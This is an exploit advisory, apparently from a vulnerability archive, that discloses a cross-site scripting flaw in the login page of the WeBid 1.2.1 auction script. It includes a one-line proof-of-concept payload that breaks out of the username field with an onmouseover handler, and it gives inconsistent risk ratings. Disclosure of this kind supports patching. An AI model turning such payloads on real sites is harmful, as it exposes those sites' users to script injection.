WeBid 1.2.1 XSS Vulnerability

2019.02.08

Mehmet EMIROGLU (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

####################################################################
# Exploit Title : WeBid 1.2.1 XSS Vulnerability
# Author [ Discovered By ] : Mehmet EMİROĞLU
# Date : 07/02/2019
# Vendor Homepage : http://www.webidsupport.com/index.php
# Software Download Link : https://sourceforge.net/projects/simpleauction/
# Affected Versions : 1.2.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
# Sofrware Description : Open source php/mysql fully featured auction script.
Perfect for those who want to start their own auction site.
####################################################################
# Impact :
*********
# This web application called as WeBid 1.2.1 version.
# The proof will be the picture below.
# https://i.hizliresim.com/r55qZP.jpg
####################################################################
# PoC :
****************************
# XSS Code : " onmouseover="alert(1007175)
# Post Request : http://localhost/[PATH]/user_login.php^csrftoken=&password=2829008&username=2871992" onmouseover="alert(1007175)
####################################################################

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WeBid 1.2.1 XSS Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.